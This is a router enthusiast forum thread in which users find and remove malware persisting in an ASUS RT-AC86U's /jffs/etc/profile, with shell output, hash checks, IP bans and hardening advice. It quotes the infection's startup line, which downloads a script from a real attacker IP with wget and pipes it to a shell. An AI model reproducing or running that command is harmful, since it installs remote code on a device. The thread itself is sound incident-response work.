ASUSWRT-Merlin RT-AC86U 386.2_4 Fri Apr 30 21:01:21 UTC 2021
rtradmin@RT-AC86U:/tmp/home/root# cat /jffs/etc/profile
(sleep 70; cp /jffs/security_check /tmp/check; chmod 777 /tmp/check; /tmp/check)&
Exactly what I was thinking. Either that or he's installed some bespoke scripting of his own.is it just me or does that look like malware?
is it just me or does that look like malware?
Exactly what I was thinking. Either that or he's installed some bespoke scripting of his own.
Did this router ever have a non-stock or non-Merlin firmware installed on it? Some of the illegal Chinese versions like Koolshare put similar things in /jffs.
The best thing would be to do a factory reset and reformat the jffs partition.
If your router is exposing its web interface to the Internet, I strongly recommend you disable that, and use a VPN instead for remote management.
And since you were previously infected and we have no idea what was done to your router, it would probably a good idea to change any password you had configured on that router.
So was this really tied to running amtm, or was it just coincidence that you were running amtm 70 seconds after logging in and auto-loading your profile?
Any jffs backups that might still have the file in it?
Any jffs backups that might still have the file in it?
ASUSWRT-Merlin RT-AC86U 386.2_6 Sun Jun 6 16:35:11 UTC 2021
RT-AC86U:/tmp/home/root# /tmp/check: line 1: syntax error: unexpected "("
RT-AC86U:/tmp/home/root# ls -ltrah /jffs/checksumm
-rw-rw-rw- 1 rtradmin root 123.6K Jul 4 15:50 /jffs/checksumm
RT-AC86U:/tmp/home/root# ls -ltrah /tmp/check
-rwxrwxrwx 1 rtradmin root 123.6K Jul 7 11:16 /tmp/check
RT-AC86U:/tmp/home/root# ls -ltrah /jffs/etc/profile
-rwxrwxrwx 1 rtradmin root 174 Jul 4 17:12 /jffs/etc/profile
RT-AC86U:/tmp/home/root# md5sum /jffs/checksumm
a5b8248a1bd25f41ef67c6fef89160ef /jffs/checksumm
RT-AC86U:/tmp/home/root# md5sum /tmp/check
a5b8248a1bd25f41ef67c6fef89160ef /tmp/check
RT-AC86U:/tmp/home/root# cat /jffs/etc/profile
(sleep 70; if [ ! -f /jffs/checksumm ]; then wget -O- http://194.36.190.99:38291/as/downl_crt.sh | ash; fi; cp /jffs/checksumm /tmp/check; chmod 777 /tmp/check; /tmp/check)&
sh /jffs/scripts/firewall ban sainnguatc.com
sh /jffs/scripts/firewall ban ip 194.36.190.99
sh /jffs/scripts/firewall ban ip 91.211.88.6
RT-AC86U:/tmp/home/root# find / -type f -not -path "/proc/*" -not -path "/sys/*" -exec md5sum {} + | grep '^a5b8248a1bd25f41ef67c6fef89160ef'
a5b8248a1bd25f41ef67c6fef89160ef /tmp/check
a5b8248a1bd25f41ef67c6fef89160ef /jffs/checksumm
RT-AC86U:/# rm -rf /tmp/check
RT-AC86U:/# rm -rf /jffs/checksumm
Interesting. Luckily for you the downloader script seems to have misidentified your router as a MIPS device and downloaded the wrong executable.
If AiMesh is your only service open to the WAN, then I recommend disabling that. It would indicate that this is the attack vector, if you are sure that your WAN interface itself is not open to the WAN.
Asus notified, they will take care of it.
I also noticed that as of today, Eset is also blocking access to that payload website.
Welcome To SNBForums
SNBForums is a community for anyone who wants to learn about or discuss the latest in wireless routers, network storage and the ins and outs of building and maintaining a small network.
If you'd like to post a question, simply register and have at it!
While you're at it, please check out SmallNetBuilder for product reviews and our famous Router Charts, Ranker and plenty more!